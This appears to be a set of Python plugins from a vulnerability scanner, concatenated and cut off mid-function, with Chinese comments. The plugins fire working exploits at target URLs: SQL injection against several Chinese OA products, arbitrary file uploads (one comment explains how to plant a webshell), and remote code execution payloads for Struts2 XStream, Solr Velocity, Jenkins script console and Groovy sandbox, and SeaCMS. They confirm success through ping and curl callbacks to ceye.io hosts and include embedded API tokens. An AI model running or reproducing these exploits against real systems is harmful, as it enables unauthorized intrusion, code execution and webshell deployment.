def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
Medusas = []
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
#s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
elif ProxyIp == None:
resp = requests.get(payload_url,
headers=headers,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if con.lower().find('bbbmicrosoft') != -1:
Medusa = "{} 存在用友FE协作办公平台5.5 SQL注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
Medusas.append(str(Medusa))
except Exception as e:
pass
try:
payload_url2 = scheme + "://" + url + payload2
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
start_time = time.time()
#s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.get(payload_url2,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
elif ProxyIp == None:
resp = requests.get(payload_url2,
headers=headers,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if time.time() - start_time >= 6:
Medusa = "{} 存在用友FE协作办公平台5.5 SQL注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url2)
Medusas.append(str(Medusa))
_t = VulnerabilityInfo(Medusas)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
Medusas_str = ''
for i in Medusas:
Medusas_str = Medusas_str + i
return (str(Medusas_str))
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
Medusas = []
try:
for turl in urls:
payload_url = scheme + "://" + url + turl + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
#s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
elif ProxyIp == None:
resp = requests.get(payload_url,
headers=headers,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if code == 500 and con.lower().find('gqxmicrosoft') != -1:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
Medusas.append(str(Medusa))
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (_t.info)
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
try:
payload_url = scheme + "://" + url + "/include/get_user.aspx"
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
#s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
elif ProxyIp == None:
resp = requests.get(payload_url,
headers=headers,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if con.lower().find('button_normal') != -1:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
Medusas.append(str(Medusa))
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (_t.info)
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
_t = VulnerabilityInfo(Medusas)
return (_t.info)
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
try:
payload = "/library/editornew/Editor/img_save.asp"
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert
testvul
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"
提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"
baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"
45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
# if ProxyIp!=None:
# proxies = {
# # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
# "http": "http://" + str(ProxyIp)
# }
# resp = s.post(payload_url,data=data,headers=headers, timeout=6, proxies=proxies,verify=False)
# elif ProxyIp==None:
resp = s.post(payload_url,
data=data,
headers=headers,
timeout=6,
verify=False)
con = resp.text
match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
if match:
payload_url2 = scheme + "://" + url + ":" + str(
port) + "/library/editornew/Editor/NewImage/" + match.group(1)
resp2 = s.get(payload_url2,
headers=headers,
timeout=6,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
#如果要上传shell直接把testvul这个值改为一句话就可以
if code2 == 200 and con2.lower().find("testvul") != -1:
Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (str(_t.info))
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload_url = scheme + "://" + url + ':' + str(port) + '/orders/3/edit'
host = url + ':' + str(port)
payload = '''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>ping</string>
<string>{}.S2052.7ktb2x.ceye.io</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''.format(url)
headers = {
'Host': host,
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Connection': 'close',
'Content-Type': 'application/xml',
}
try:
s = requests.session()
resp = s.post(payload_url,
data=payload,
headers=headers,
timeout=5,
verify=False)
ceyeurl = 'http://api.ceye.io/v1/records?token=f84734983a259c598a1edeb772981d14&type=dns&filter='
time.sleep(5)
ceye_content = requests.get(ceyeurl, timeout=3)
flag = "{}.S2052".format(url)
if flag in ceye_content:
Medusa = "{}存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:Struts2_1_2-Struts2_3_33,Struts2_5-Struts2_5_12\r\nPayload:{}\r\nPost:{}\r\n".format(
url, payload_url, payload)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") #获取传入的url参数
Headers = kwargs.get("Headers") #获取传入的头文件
proxies = kwargs.get("Proxies") #获取传入的代理参数
try:
Headers1 = Headers
Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
payload_url = url + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=Headers1).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
DL = ClassCongregation.Dnslog()
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
DL.dns_host())
payload_url1 = url + payload
payload_url2 = url + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
Headers2 = Headers
Headers2['Content-Type'] = 'application/json'
resp = requests.post(payload_url1,
data=payload_data,
headers=Headers2,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=Headers1,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
if DL.result():
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(
url, con2, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
RD = ClassCongregation.randoms().result(20)
payload = "/library/editornew/Editor/img_save.asp"
payload_url = url + payload
data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert
{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"
提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"
baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"
45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(RD).encode('utf-8')
Headers['Content-Type'] = 'application/x-www-form-urlencoded'
Headers[
'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
resp = requests.post(payload_url,
data=data,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
if match:
payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group(
1)
resp2 = requests.get(payload_url2,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
#如果要上传shell直接把testvul这个值改为一句话就可以
if code2 == 200 and con2.lower().find(RD) != -1:
Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload1 = "/base/post.php"
payload_url1 = scheme + '://' + url + ':' + str(port) + payload1
dada = "act=appcode"
payload2 = "/base/appfile.php"
payload_url2 = scheme + '://' + url + ':' + str(port) + payload2
ran = ranstr(10)
payload_url3 = scheme + '://' + url + ':' + str(
port) + "/effect/source/bg/{}.txt".format(ran)
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
}
headers2 = {
'Accept-Encoding':
'gzip, deflate',
'Accept':
'*/*',
'Accept-Language':
'en',
'User-Agent':
RandomAgent,
'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE',
}
resp = requests.post(payload_url1,
data=dada,
proxies=proxies,
headers=headers,
timeout=5,
verify=False)
con = resp.text
k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值
md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"
1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"
upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"
10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"
getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
resp2 = requests.post(payload_url2,
data=dada2,
proxies=proxies,
headers=headers2,
timeout=5,
verify=False)
resp3 = requests.get(payload_url3,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
code3 = resp3.status_code
con3 = resp3.text
if code3 == 200 and con3.find(ran) != -1:
Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
url, payload_url2, dada2, payload_url3, con3)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
#medusa("http://192.168.0.142","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
try:
payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
payload_url = scheme + "://" + url + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = s.post(payload_url,
data={
'formids':
'11111111111)))' + '\x0a\x0d' * 360 +
'union select NULL,instance_name from '
'v$instance order by (((1'
},
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
elif ProxyIp == None:
resp = s.post(payload_url,
data={
'formids':
'11111111111)))' + '\x0a\x0d' * 360 +
'union select NULL,instance_name from '
'v$instance order by (((1'
},
headers=headers,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.lower(
).find('''"draggable":''') != -1 and con.lower(
).find('''"checked":''') != -1 and con.lower().find(
'''"id":''') != -1 and con.lower().find('''"text":''') != -1:
Medusa = "{} 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(
url, payload_url, '11111111111)))' + '\x0a\x0d' * 360 +
'union select NULL,instance_name from '
'v$instance order by (((1')
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (_t.info)
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url, timeout=6, headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
ran = ranstr(10)
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}.mdtx4t.ceye.io%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
ran)
payload_url1 = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,
data=payload_data,
headers=headers1,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
verify=False)
dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=dns&filter='
time.sleep(5)
resp3 = requests.get(dnslog, timeout=5, verify=False)
con2 = resp2.text
con3 = resp3.text
if con3.find(ran) != -1:
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\n回显内容:{}\r\nDNSlog:{}\r\n".format(
url, con2, con3)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
for turl in urls:
try:
payload_url = scheme + "://" + url + turl + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if code == 500 and con.lower().find('gqxmicrosoft') != -1:
Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, Token).Write() # 传入url和扫描到的数据
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
try:
payload_url = scheme + "://" + url + ':' + str(
port) + "/include/get_user.aspx"
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
con = resp.text
if con.lower().find('button_normal') != -1:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, Token).Write() # 传入url和扫描到的数据
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp=None):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
ran = ranstr(10)
post_data = '''script%3dprintln+%22ping+%7b%7d.mdtx4t.ceye.io%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+%7b%7d.mdtx4t.ceye.io%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format(
ran, ran)
payload = "/script"
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
s = requests.session()
cookises = re.compile('.*Cookie (.*) for.*').findall(
str(s.get(payload_url).cookies))[0] #正则匹配获取的Cookie字符串
print(cookises)
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cookis': cookises
}
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = s.post(payload_url,
headers=headers,
data=post_data,
timeout=6,
proxies=proxies,
verify=False)
elif ProxyIp == None:
resp = s.post(payload_url,
headers=headers,
data=post_data,
timeout=6,
verify=False)
dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=http&filter='
time.sleep(5)
resp2 = requests.get(dnslog, timeout=5, verify=False)
con = resp.text
con2 = resp2.text
if con.find(ran) != -1:
Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format(
url, payload_url, con, con2)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (str(_t.info))
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) #调用写入类
#medusa('http://120.26.60.154:8080','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
try:
payload = "/search.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();"
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': scheme + '://' + url,
'Referer': payload
}
s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = s.post(payload_url,
headers=headers,
data=payload_data,
timeout=6,
proxies=proxies,
verify=False)
elif ProxyIp == None:
resp = s.post(payload_url,
headers=headers,
data=payload_data,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('System') != -1 and con.find(
'Compiler'
) != -1 and con.find('Build Date') != -1 and con.find(
'IPv6 Support') != -1 and con.find('Configure Command') != -1:
Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
url, payload_url, con.encode(encoding='utf-8'))
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (str(_t.info))
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
#medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
try:
ran = ranstr(10)
a = '''public class x {
public x(){
"curl %s.mdtx4t.ceye.io".execute()
}
}''' % ran
payload2 = urllib.parse.quote(a) # url编码
payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
payload_url = scheme + "://" + url + ':' + str(
port) + payload1 + payload2
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept-Encoding':
'gzip, deflate',
'Accept-Language':
'en',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
elif ProxyIp == None:
